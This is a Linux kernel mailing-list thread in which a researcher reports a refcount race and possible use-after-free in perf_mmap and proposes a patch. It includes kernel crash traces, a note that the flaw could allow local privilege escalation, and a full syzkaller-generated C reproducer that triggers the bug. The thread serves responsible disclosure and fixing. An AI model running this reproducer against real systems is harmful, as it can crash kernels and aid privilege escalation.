R15: 00007f7ef46f3640 </TASK> ---[ end trace 0000000000000000 ]--- EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost EXT4-fs (loop0): Total free blocks count 0 EXT4-fs (loop0): Free/Dirty block details EXT4-fs (loop0): free_blocks=12386304 EXT4-fs (loop0): dirty_blocks=16387 EXT4-fs (loop0): Block reservation details EXT4-fs (loop0): i_reserved_data_blocks=16387 EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> SYZFAIL: failed to recv rpc fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor) <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> Reproduce ---------- The issue is reproducible using the C reproducer attached. 
The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown. The reproducer follows this execution flow:

1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. Meanwhile, Thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.

Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a use-after-free (UAF) condition. While the immediate symptom is typically a kernel warning or a denial of service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming.
If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible. Patch -------------- From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001 From: 0ne1r0s <yuhaocheng035@gmail.com> Date: Sat, 31 Jan 2026 21:16:52 +0800 Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap The issue is caused by a race condition between mmap() and event teardown. In perf_mmap(), the ring_buffer (rb) is accessed via map_range() after the mmap_mutex is released. If another thread closes the event or detaches the buffer during this window, the reference count of rb can drop to zero, leading to a UAF or refcount saturation when map_range() or subsequent logic attempts to use it. Fix this by extending the scope of mmap_mutex to cover the entire setup process, including map_range(), ensuring the buffer remains valid until the mapping is complete. Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com> --- kernel/events/core.c | 42 +++++++++++++++++++++--------------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/kernel/events/core.c b/kernel/events/core.c index 2c35acc2722b..7c93f7d057cb 100644 --- a/kernel/events/core.c +++ b/kernel/events/core.c @@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma) ret = perf_mmap_aux(vma, event, nr_pages); if (ret) return ret; - } - - /* - * Since pinned accounting is per vm we cannot allow fork() to copy our - * vma. - */ - vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); - vma->vm_ops = &perf_mmap_vmops; - mapped = get_mapped(event, event_mapped); - if (mapped) - mapped(event, vma->vm_mm); - - /* - * Try to map it into the page table. 
On fail, invoke - * perf_mmap_close() to undo the above, as the callsite expects - * full cleanup in this case and therefore does not invoke - * vmops::close(). - */ - ret = map_range(event->rb, vma); - if (ret) - perf_mmap_close(vma); + /* + * Since pinned accounting is per vm we cannot allow fork() to copy our + * vma. + */ + vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); + vma->vm_ops = &perf_mmap_vmops; + + mapped = get_mapped(event, event_mapped); + if (mapped) + mapped(event, vma->vm_mm); + + /* + * Try to map it into the page table. On fail, invoke + * perf_mmap_close() to undo the above, as the callsite expects + * full cleanup in this case and therefore does not invoke + * vmops::close(). + */ + ret = map_range(event->rb, vma); + if (ret) + perf_mmap_close(vma); + } return ret; } -- 2.51.0

Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.

Best regards,
Haocheng Yu
Zhejiang University
arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f4a5add3b9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000 RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0 </TASK> ---[ end trace 0000000000000000 ]--- Syzkaller reproducer: # {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}} pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff) r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8) mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0) r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 
0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2) mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0) C reproducer: // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <endian.h> #include <setjmp.h> #include <signal.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #ifndef __NR_pkey_mprotect #define __NR_pkey_mprotect 329 #endif static __thread int clone_ongoing; static __thread int skip_segv; static __thread jmp_buf segv_env; static void segv_handler(int sig, siginfo_t* info, void* ctx) { if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) { exit(sig); } uintptr_t addr = (uintptr_t)info->si_addr; const uintptr_t prog_start = 1 << 20; const uintptr_t prog_end = 100 << 20; int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0; int valid = addr < prog_start || addr > prog_end; if (skip && valid) { _longjmp(segv_env, 1); } exit(sig); } static void install_segv_handler(void) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_handler = SIG_IGN; syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8); syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8); memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = segv_handler; sa.sa_flags = SA_NODEFER | SA_SIGINFO; sigaction(SIGSEGV, &sa, NULL); sigaction(SIGBUS, &sa, NULL); } #define NONFAILING(...) 
\ ({ \ int ok = 1; \ __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \ if (_setjmp(segv_env) == 0) { \ __VA_ARGS__; \ } else \ ok = 0; \ __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \ ok; \ }) #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); const char* reason; (void)reason; install_segv_handler(); intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } // pkey_mprotect arguments: [ // addr: VMA[0x2000] // len: len = 0x2000 (8 bytes) // prot: mmap_prot = 0x5 (8 bytes) // key: pkey (resource) // ] syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul, /*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 
bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // 
__reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x8 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); 
NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/(intptr_t)-1, /*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul); if (res != -1) r[0] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x0 (8 bytes) // flags: mmap_flags = 0x11 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 
= 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x2 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul); if (res != -1) r[1] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x100000b (8 bytes) // flags: mmap_flags = 0x13 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul, /*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul, /*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1], /*offset=*/0ul); return 0; }
> Can you turn this into a patch we can apply (properly sent, real name

Hi Greg,

Sorry for not knowing the rules and mistakenly sending this to the wrong people. I have just submitted the formal patch to the perf subsystem maintainers, with the correct formatting and my real name.

Thanks for the guidance!

Best regards,
Haocheng Yu
{ "author": "=?UTF-8?B?5L2Z5piK6ZOW?= <haochengyu@zju.edu.cn>", "date": "Sun, 1 Feb 2026 19:35:31 +0800 (GMT+08:00)", "thread_id": "20260202162057.7237-1-yuhaocheng035@gmail.com.mbox.gz" }
lkml
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
Hello,

I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.

Summary
-------

